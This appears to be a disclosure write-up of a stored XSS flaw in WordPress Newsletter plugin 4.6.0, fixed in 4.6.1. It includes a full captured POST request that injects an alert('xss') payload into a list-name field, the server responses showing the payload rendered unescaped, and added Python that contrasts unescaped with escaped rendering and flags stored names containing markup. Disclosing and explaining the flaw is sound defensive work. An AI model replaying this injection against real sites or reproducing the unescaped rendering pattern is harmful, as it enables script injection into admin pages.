
XSS issue in WordPress Plugin: Newsletter Version 4.6.0

I recently reported a Reflected Cross-Site Scripting (XSS) issue in the WordPress plugin Newsletter 4.6.0 (https://wordpress.org/plugins/newsletter/) to plugins@wordpress.org.


The developers have since released a patched version of the plugin (4.6.1); see https://wordpress.org/plugins/newsletter/changelog/ for details.

1. Stored Cross-Site Scripting (XSS)
Authenticated administrators can inject HTML/JS code into the list names, which are stored and later rendered unescaped on another admin page (there is no CSRF protection).
Method: POST
Vulnerable Parameter(s): 
options[list_1]
options[list_2]
options[list_3]
options[list_4]
options[list_5]
options[list_6]
options[list_7]
options[list_8]
options[list_9]
options[list_10]
options[list_11]
options[list_12]
options[list_13]
options[list_14]
options[list_15]
options[list_16]
options[list_17]
options[list_18]
options[list_19]
options[list_20]
Example Attack:
Request:
POST /wordpress/wp-admin/admin.php?page=newsletter_subscription_lists HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1762
act=save&btn=&_wpnonce=7cad5407b5&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dnewsletter_subscription_lists&options%5Blist_1%5D=test&options%5Blist_1_status%5D=1&options%5Blist_1_checked%5D=1&options%5Blist_2%5D=&options%5Blist_2_status%5D=0&options%5Blist_2_checked%5D=0&options%5Blist_3%5D=&options%5Blist_3_status%5D=0&options%5Blist_3_checked%5D=0&options%5Blist_4%5D=&options%5Blist_4_status%5D=0&options%5Blist_4_checked%5D=0&options%5Blist_5%5D=&options%5Blist_5_status%5D=0&options%5Blist_5_checked%5D=0&options%5Blist_6%5D=&options%5Blist_6_status%5D=0&options%5Blist_6_checked%5D=0&options%5Blist_7%5D=bi1x5alert('xss')gjoce&options%5Blist_7_status%5D=0&options%5Blist_7_checked%5D=0&options%5Blist_8%5D=&options%5Blist_8_status%5D=0&options%5Blist_8_checked%5D=0&options%5Blist_9%5D=&options%5Blist_9_status%5D=0&options%5Blist_9_checked%5D=0&options%5Blist_10%5D=&options%5Blist_10_status%5D=0&options%5Blist_10_checked%5D=0&options%5Blist_11%5D=&options%5Blist_11_status%5D=0&options%5Blist_11_checked%5D=0&options%5Blist_12%5D=&options%5Blist_12_status%5D=0&options%5Blist_12_checked%5D=0&options%5Blist_13%5D=&options%5Blist_13_status%5D=0&options%5Blist_13_checked%5D=0&options%5Blist_14%5D=&options%5Blist_14_status%5D=0&options%5Blist_14_checked%5D=0&options%5Blist_15%5D=&options%5Blist_15_status%5D=0&options%5Blist_15_checked%5D=0&options%5Blist_16%5D=&options%5Blist_16_status%5D=0&options%5Blist_16_checked%5D=0&options%5Blist_17%5D=&options%5Blist_17_status%5D=0&options%5Blist_17_checked%5D=0&options%5Blist_18%5D=&options%5Blist_18_status%5D=0&options%5Blist_18_checked%5D=0&options%5Blist_19%5D=&options%5Blist_19_status%5D=0&options%5Blist_19_checked%5D=0&options%5Blist_20%5D=&options%5Blist_20_status%5D=0&options%5Blist_20_checked%5D=0
Response:
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:12 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102536
Request:
GET /wordpress/wp-admin/admin.php?page=newsletter_users_massive HTTP/1.1
Host: localhost:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Response:
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:37 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=edge
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98989
For preference <select id="options-list" name="options[list]"><option value="1">(1) test</option><option value="2">(2) </option><option value="3">(3) </option><option value="4">(4) </option><option value="5">(5) </option><option value="6">(6) </option><option value="7">(7) bi1x5alert('xss')gjoce</option><option value="8">(8)
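The exchange above shows the whole defect: list names arrive in options[list_N] fields, are stored as-is, and come back unescaped inside the option text of the newsletter_users_massive page. The following Python is an added illustration (not the plugin's code) that parses a constructed body in the same shape as the captured request, renders the select the vulnerable way and the escaped way, and flags stored names that carry markup; the sample payload spells out the script tags that the blog rendering stripped from the original capture.

```python
import re
from html import escape
from urllib.parse import parse_qs

# Constructed sample body, mirroring the captured POST: only list_1 and list_7
# are set here; the payload uses explicit <script> tags for illustration.
SAMPLE_BODY = (
    "act=save&_wpnonce=7cad5407b5"
    "&options%5Blist_1%5D=test&options%5Blist_1_status%5D=1"
    "&options%5Blist_7%5D=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E"
    "&options%5Blist_7_status%5D=0"
)

# Matches options[list_N] but not options[list_N_status] / options[list_N_checked]
LIST_KEY = re.compile(r"^options\[list_(\d+)\]$")


def parse_list_names(body: str) -> dict:
    """Return {list_number: stored_name} for every options[list_N] field."""
    names = {}
    for key, values in parse_qs(body, keep_blank_values=True).items():
        match = LIST_KEY.match(key)
        if match:
            names[int(match.group(1))] = values[0]
    return names


def render_select_unescaped(names: dict) -> str:
    """The vulnerable pattern: stored names echoed verbatim into option text."""
    opts = "".join(f'<option value="{n}">({n}) {names.get(n, "")}</option>'
                   for n in range(1, 21))
    return f'<select id="options-list" name="options[list]">{opts}</select>'


def render_select_escaped(names: dict) -> str:
    """Hardened rendering: HTML-escape each name on output (esc_html in WordPress)."""
    opts = "".join(f'<option value="{n}">({n}) {escape(names.get(n, ""))}</option>'
                   for n in range(1, 21))
    return f'<select id="options-list" name="options[list]">{opts}</select>'


def find_markup(names: dict) -> dict:
    """Detection aid: stored list names containing HTML metacharacters."""
    return {n: v for n, v in names.items() if re.search(r"[<>\"']", v)}
```

Escaping on output closes the rendering hole; the save handler still needs a nonce check and capability check to address the missing CSRF protection.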